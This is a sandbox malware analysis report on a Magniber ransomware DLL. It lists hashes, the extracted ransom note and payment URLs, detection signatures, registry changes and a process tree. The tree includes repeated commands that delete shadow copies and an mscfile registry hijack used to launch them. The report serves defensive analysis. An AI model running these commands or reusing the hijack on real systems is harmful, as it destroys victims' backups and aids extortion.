magniber | 929a064ebaea59c3bd2442df949754d1cdd12cb547929927ec7b7adaafc05726

Analysis

max time kernel
121s
max time network
123s
platform
windows7_x64
resource
win7-20241010-en
resource tags

arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
submitted
10-10-2024 19:39

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

3187619e1573920b7ef0cf1daecdabd4_JaffaCakes118.dll
Size

20KB
MD5

3187619e1573920b7ef0cf1daecdabd4
SHA1

aa3831500894819b2444f25af36e8ddc7aea1cda
SHA256

929a064ebaea59c3bd2442df949754d1cdd12cb547929927ec7b7adaafc05726
SHA512

c83121077118fe574aec011e91b95d985edf2377aae453065009dea9479850724ae0861f02338f876a3a7827c4e079a8faec229ec5939520eb9ef66d27e30d1a
SSDEEP

384:mCx9m9yVxnPhI1hEtGFlGgRzeZHtJmTqP2F47vhdds6sWDa:mk9m9yVxPhshEtGFlGgRze7Jxhrs

Score

10^/10

magniber defense_evasion discovery execution impact ransomware

Malware Config

Extracted

Path

C:\Users\Admin\Pictures\readme.txt

Family

magniber

Ransom Note

ALL YOUR DOCUMENTS PHOTOS DATABASES AND OTHER IMPORTANT FILES HAVE BEEN ENCRYPTED! ==================================================================================================== Your files are NOT damaged! Your files are modified only. This modification is reversible. The only 1 way to decrypt your files is to receive the private key and decryption program. Any attempts to restore your files with the third party software will be fatal for your files! ==================================================================================================== To receive the private key and decryption program follow the instructions below: 1. Download "Tor Browser" from https://www.torproject.org/ and install it. 2. In the "Tor Browser" open your personal page here: http://baccf010c8f03ca06eillvahk.m647u2xsjtlfyzuevlxjiiwjsg2btyhmbxbjz4in4hm76u6hjzc62wad.onion/illvahk Note! This page is available via "Tor Browser" only. ==================================================================================================== Also you can use temporary addresses on your personal page without using "Tor Browser": http://baccf010c8f03ca06eillvahk.ourunit.xyz/illvahk http://baccf010c8f03ca06eillvahk.topsaid.site/illvahk http://baccf010c8f03ca06eillvahk.gosmark.space/illvahk http://baccf010c8f03ca06eillvahk.iecard.top/illvahk Note! These are temporary addresses! They will be available for a limited amount of time!

URLs

http://baccf010c8f03ca06eillvahk.m647u2xsjtlfyzuevlxjiiwjsg2btyhmbxbjz4in4hm76u6hjzc62wad.onion/illvahk

http://baccf010c8f03ca06eillvahk.ourunit.xyz/illvahk

http://baccf010c8f03ca06eillvahk.topsaid.site/illvahk

http://baccf010c8f03ca06eillvahk.gosmark.space/illvahk

http://baccf010c8f03ca06eillvahk.iecard.top/illvahk

Signatures

Detect magniber ransomware 1 IoCs

resource	yara_rule
behavioral1/memory/2432-0-0x0000000001F00000-0x0000000002772000-memory.dmp	family_magniber

Magniber Ransomware
Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.
ransomware magniber

Process spawned unexpected child process 15 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2704	3028	vssadmin.exe	40
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3024	3028	cmd.exe	40
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1612	3028	vssadmin.exe	40
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2104	3028	cmd.exe	40
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2320	3028	vssadmin.exe	40
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	948	3028	vssadmin.exe	40
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	932	3028	cmd.exe	40
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1248	3028	vssadmin.exe	40
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2064	3028	vssadmin.exe	40
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1544	3028	cmd.exe	40
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1468	3028	vssadmin.exe	40
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1196	3028	vssadmin.exe	40
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3016	3028	cmd.exe	40
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2668	3028	vssadmin.exe	40
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2480	3028	vssadmin.exe	40

Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047
Renames multiple (80) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 2432 set thread context of 1052	2432	rundll32.exe	18
PID 2432 set thread context of 1120	2432	rundll32.exe	19
PID 2432 set thread context of 1184	2432	rundll32.exe	21
PID 2432 set thread context of 1492	2432	rundll32.exe	25

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE

Interacts with shadow copies 3 TTPs 10 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1070.004

Inhibit System Recovery

T1490

Direct Volume Access

T1006

pid	Process
2320	vssadmin.exe
948	vssadmin.exe
1248	vssadmin.exe
2064	vssadmin.exe
2480	vssadmin.exe
2704	vssadmin.exe
1612	vssadmin.exe
1468	vssadmin.exe
1196	vssadmin.exe
2668	vssadmin.exe

Modifies Internet Explorer settings 1 TTPs 34 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "434751077"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{7236BCB1-873F-11EF-95F7-72BC2935A1B8} = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\SearchScopes	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000e78a69453f00554b9c7935775bae7b96000000000200000000001066000000010000200000009ebe72afbf0a474d1ba0c4778aa17a5c3f19c2b55b98ad51abdda922c08ca94f000000000e8000000002000020000000874a691d6d1d14ea6abd6d36430917e69bd63e75fa4c67b510c156f4af0265b22000000049677725799c3485a7503bbdb906c3ae8d08fed4ba8e44a48b58f527d02afbac40000000edf75b3d78c22427ded55fa2929b7341711939e0141faba9962f6f14b4e4051ab8bca13ad63d091cb31d9ce713d64d1110f850256cf6e608d6c74b014cfc61ed	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 908ea4484c1bdb01	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000e78a69453f00554b9c7935775bae7b96000000000200000000001066000000010000200000005bf646b8eb0090d814b66d25866939c8dbe8c9e40568ed57331b9bf87e09a3f3000000000e8000000002000020000000afa7edca5b95085fc43c64733b25b83c540dfa38d4f23c6a5a426ea05455386a9000000062743a06a9ac8f54e2303a70cec890f4692436ab7a6a514ee755e3b1697a7a7e8fae8a297f4cf71b164e9f3a7fe83c671fbaf52a5d9741a0ca6b3a1b832e7d9d5d0dcd843a8fe24b71879a9571977c22374a60df772148b6cac298d05eaec7e603108347bab5f8ade69e6fe21045ad431724db5f11504d75adf4f33392c62008edda4c792be4d070b8db14d63d4fd547400000000492379423c775360b30c00d3d6d17b7aa007633cada724a8e6f2e447215c977a88bbe0b5bc685707ec00cfb6a5ccb84e48d53bd7d12cb3aae437abeab550032	iexplore.exe

Modifies registry class 13 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	DllHost.exe
Key created	\REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000_CLASSES\mscfile\shell\open\command	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000_CLASSES\mscfile\shell	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000_CLASSES\mscfile\shell\open\command	taskhost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	taskhost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	Dwm.exe
Key created	\REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000_CLASSES\mscfile\shell\open\command	DllHost.exe
Key created	\REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000_CLASSES\mscfile	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000_CLASSES\mscfile\shell\open	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000_CLASSES\mscfile\shell\open\command	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000_CLASSES\mscfile\shell\open\command	Dwm.exe

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

pid	Process
1540	notepad.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2432	rundll32.exe
2432	rundll32.exe

Suspicious behavior: MapViewOfSection 4 IoCs

pid	Process
2432	rundll32.exe
2432	rundll32.exe
2432	rundll32.exe
2432	rundll32.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	1184	Explorer.EXE
Token: SeShutdownPrivilege	1184	Explorer.EXE
Token: SeIncreaseQuotaPrivilege	780	wmic.exe
Token: SeSecurityPrivilege	780	wmic.exe
Token: SeTakeOwnershipPrivilege	780	wmic.exe
Token: SeLoadDriverPrivilege	780	wmic.exe
Token: SeSystemProfilePrivilege	780	wmic.exe
Token: SeSystemtimePrivilege	780	wmic.exe
Token: SeProfSingleProcessPrivilege	780	wmic.exe
Token: SeIncBasePriorityPrivilege	780	wmic.exe
Token: SeCreatePagefilePrivilege	780	wmic.exe
Token: SeBackupPrivilege	780	wmic.exe
Token: SeRestorePrivilege	780	wmic.exe
Token: SeShutdownPrivilege	780	wmic.exe
Token: SeDebugPrivilege	780	wmic.exe
Token: SeSystemEnvironmentPrivilege	780	wmic.exe
Token: SeRemoteShutdownPrivilege	780	wmic.exe
Token: SeUndockPrivilege	780	wmic.exe
Token: SeManageVolumePrivilege	780	wmic.exe
Token: 33	780	wmic.exe
Token: 34	780	wmic.exe
Token: 35	780	wmic.exe
Token: SeShutdownPrivilege	1184	Explorer.EXE
Token: SeShutdownPrivilege	1184	Explorer.EXE
Token: SeIncreaseQuotaPrivilege	1212	WMIC.exe
Token: SeSecurityPrivilege	1212	WMIC.exe
Token: SeTakeOwnershipPrivilege	1212	WMIC.exe
Token: SeLoadDriverPrivilege	1212	WMIC.exe
Token: SeSystemProfilePrivilege	1212	WMIC.exe
Token: SeSystemtimePrivilege	1212	WMIC.exe
Token: SeProfSingleProcessPrivilege	1212	WMIC.exe
Token: SeIncBasePriorityPrivilege	1212	WMIC.exe
Token: SeCreatePagefilePrivilege	1212	WMIC.exe
Token: SeBackupPrivilege	1212	WMIC.exe
Token: SeRestorePrivilege	1212	WMIC.exe
Token: SeShutdownPrivilege	1212	WMIC.exe
Token: SeDebugPrivilege	1212	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1212	WMIC.exe
Token: SeRemoteShutdownPrivilege	1212	WMIC.exe
Token: SeUndockPrivilege	1212	WMIC.exe
Token: SeManageVolumePrivilege	1212	WMIC.exe
Token: 33	1212	WMIC.exe
Token: 34	1212	WMIC.exe
Token: 35	1212	WMIC.exe
Token: SeIncreaseQuotaPrivilege	780	wmic.exe
Token: SeSecurityPrivilege	780	wmic.exe
Token: SeTakeOwnershipPrivilege	780	wmic.exe
Token: SeLoadDriverPrivilege	780	wmic.exe
Token: SeSystemProfilePrivilege	780	wmic.exe
Token: SeSystemtimePrivilege	780	wmic.exe
Token: SeProfSingleProcessPrivilege	780	wmic.exe
Token: SeIncBasePriorityPrivilege	780	wmic.exe
Token: SeCreatePagefilePrivilege	780	wmic.exe
Token: SeBackupPrivilege	780	wmic.exe
Token: SeRestorePrivilege	780	wmic.exe
Token: SeShutdownPrivilege	780	wmic.exe
Token: SeDebugPrivilege	780	wmic.exe
Token: SeSystemEnvironmentPrivilege	780	wmic.exe
Token: SeRemoteShutdownPrivilege	780	wmic.exe
Token: SeUndockPrivilege	780	wmic.exe
Token: SeManageVolumePrivilege	780	wmic.exe
Token: 33	780	wmic.exe
Token: 34	780	wmic.exe
Token: 35	780	wmic.exe

Suspicious use of FindShellTrayWindow 5 IoCs

pid	Process
2612	iexplore.exe
1184	Explorer.EXE
1184	Explorer.EXE
1184	Explorer.EXE
1184	Explorer.EXE

Suspicious use of SetWindowsHookEx 6 IoCs

pid	Process
2612	iexplore.exe
2612	iexplore.exe
2980	IEXPLORE.EXE
2980	IEXPLORE.EXE
2980	IEXPLORE.EXE
2980	IEXPLORE.EXE

Suspicious use of UnmapMainImage 1 IoCs

pid	Process
1184	Explorer.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1184 wrote to memory of 1540	1184	Explorer.EXE	31
PID 1184 wrote to memory of 1540	1184	Explorer.EXE	31
PID 1184 wrote to memory of 1540	1184	Explorer.EXE	31
PID 1184 wrote to memory of 2224	1184	Explorer.EXE	32
PID 1184 wrote to memory of 2224	1184	Explorer.EXE	32
PID 1184 wrote to memory of 2224	1184	Explorer.EXE	32
PID 1184 wrote to memory of 780	1184	Explorer.EXE	33
PID 1184 wrote to memory of 780	1184	Explorer.EXE	33
PID 1184 wrote to memory of 780	1184	Explorer.EXE	33
PID 1184 wrote to memory of 2544	1184	Explorer.EXE	34
PID 1184 wrote to memory of 2544	1184	Explorer.EXE	34
PID 1184 wrote to memory of 2544	1184	Explorer.EXE	34
PID 2544 wrote to memory of 1212	2544	cmd.exe	38
PID 2544 wrote to memory of 1212	2544	cmd.exe	38
PID 2544 wrote to memory of 1212	2544	cmd.exe	38
PID 2224 wrote to memory of 2612	2224	cmd.exe	39
PID 2224 wrote to memory of 2612	2224	cmd.exe	39
PID 2224 wrote to memory of 2612	2224	cmd.exe	39
PID 2612 wrote to memory of 2980	2612	iexplore.exe	41
PID 2612 wrote to memory of 2980	2612	iexplore.exe	41
PID 2612 wrote to memory of 2980	2612	iexplore.exe	41
PID 2612 wrote to memory of 2980	2612	iexplore.exe	41
PID 3024 wrote to memory of 2540	3024	cmd.exe	46
PID 3024 wrote to memory of 2540	3024	cmd.exe	46
PID 3024 wrote to memory of 2540	3024	cmd.exe	46
PID 2540 wrote to memory of 2772	2540	CompMgmtLauncher.exe	48
PID 2540 wrote to memory of 2772	2540	CompMgmtLauncher.exe	48
PID 2540 wrote to memory of 2772	2540	CompMgmtLauncher.exe	48
PID 2432 wrote to memory of 2788	2432	rundll32.exe	54
PID 2432 wrote to memory of 2788	2432	rundll32.exe	54
PID 2432 wrote to memory of 2788	2432	rundll32.exe	54
PID 2432 wrote to memory of 2936	2432	rundll32.exe	55
PID 2432 wrote to memory of 2936	2432	rundll32.exe	55
PID 2432 wrote to memory of 2936	2432	rundll32.exe	55
PID 2936 wrote to memory of 2316	2936	cmd.exe	58
PID 2936 wrote to memory of 2316	2936	cmd.exe	58
PID 2936 wrote to memory of 2316	2936	cmd.exe	58
PID 2104 wrote to memory of 2512	2104	cmd.exe	61
PID 2104 wrote to memory of 2512	2104	cmd.exe	61
PID 2104 wrote to memory of 2512	2104	cmd.exe	61
PID 2512 wrote to memory of 2676	2512	CompMgmtLauncher.exe	64
PID 2512 wrote to memory of 2676	2512	CompMgmtLauncher.exe	64
PID 2512 wrote to memory of 2676	2512	CompMgmtLauncher.exe	64
PID 1052 wrote to memory of 2124	1052	taskhost.exe	68
PID 1052 wrote to memory of 2124	1052	taskhost.exe	68
PID 1052 wrote to memory of 2124	1052	taskhost.exe	68
PID 1052 wrote to memory of 1300	1052	taskhost.exe	69
PID 1052 wrote to memory of 1300	1052	taskhost.exe	69
PID 1052 wrote to memory of 1300	1052	taskhost.exe	69
PID 1300 wrote to memory of 1004	1300	cmd.exe	72
PID 1300 wrote to memory of 1004	1300	cmd.exe	72
PID 1300 wrote to memory of 1004	1300	cmd.exe	72
PID 932 wrote to memory of 1924	932	cmd.exe	77
PID 932 wrote to memory of 1924	932	cmd.exe	77
PID 932 wrote to memory of 1924	932	cmd.exe	77
PID 1924 wrote to memory of 916	1924	CompMgmtLauncher.exe	78
PID 1924 wrote to memory of 916	1924	CompMgmtLauncher.exe	78
PID 1924 wrote to memory of 916	1924	CompMgmtLauncher.exe	78
PID 1120 wrote to memory of 1112	1120	Dwm.exe	82
PID 1120 wrote to memory of 1112	1120	Dwm.exe	82
PID 1120 wrote to memory of 1112	1120	Dwm.exe	82
PID 1120 wrote to memory of 2320	1120	Dwm.exe	83
PID 1120 wrote to memory of 2320	1120	Dwm.exe	83
PID 1120 wrote to memory of 2320	1120	Dwm.exe	83

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Windows\system32\taskhost.exe
"taskhost.exe"
1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1052
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  PID:2124
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1300
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
    3⤵
    PID:1004

C:\Windows\system32\Dwm.exe
"C:\Windows\system32\Dwm.exe"
1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1120
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  PID:1112
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
  2⤵
  PID:2320
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
    3⤵
    PID:1876

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of UnmapMainImage
- Suspicious use of WriteProcessMemory
PID:1184
- C:\Windows\system32\rundll32.exe
  rundll32.exe C:\Users\Admin\AppData\Local\Temp\3187619e1573920b7ef0cf1daecdabd4_JaffaCakes118.dll,#1
  2⤵
  - Suspicious use of SetThreadContext
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of WriteProcessMemory
  PID:2432
- - C:\Windows\system32\wbem\wmic.exe
    C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:2788
- - C:\Windows\system32\cmd.exe
    cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2936
  - - C:\Windows\system32\wbem\WMIC.exe
      C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
      4⤵
      PID:2316
- C:\Windows\notepad.exe
  notepad.exe C:\Users\Public\readme.txt
  2⤵
  - Opens file in notepad (likely ransom note)
  PID:1540
- C:\Windows\system32\cmd.exe
  cmd /c "start http://baccf010c8f03ca06eillvahk.ourunit.xyz/illvahk^&2^&38774292^&80^&381^&12"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2224
- - C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" http://baccf010c8f03ca06eillvahk.ourunit.xyz/illvahk&2&38774292&80&381&12
    3⤵
    - Modifies Internet Explorer settings
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:2612
  - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2612 CREDAT:275457 /prefetch:2
      4⤵
      System Location Discovery: System Language Discovery
      Modifies Internet Explorer settings
      Suspicious use of SetWindowsHookEx
      PID:2980
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:780
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2544
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1212

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
- Modifies registry class
PID:1492
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  PID:932
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
  2⤵
  PID:2112
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
    3⤵
    PID:916

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:2704

C:\Windows\system32\cmd.exe
cmd /c CompMgmtLauncher.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:3024
- C:\Windows\system32\CompMgmtLauncher.exe
  CompMgmtLauncher.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2540
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:2772

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:2744

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:1612

C:\Windows\system32\cmd.exe
cmd /c CompMgmtLauncher.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:2104
- C:\Windows\system32\CompMgmtLauncher.exe
  CompMgmtLauncher.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2512
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:2676

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:2320

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:948

C:\Windows\system32\cmd.exe
cmd /c CompMgmtLauncher.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:932
- C:\Windows\system32\CompMgmtLauncher.exe
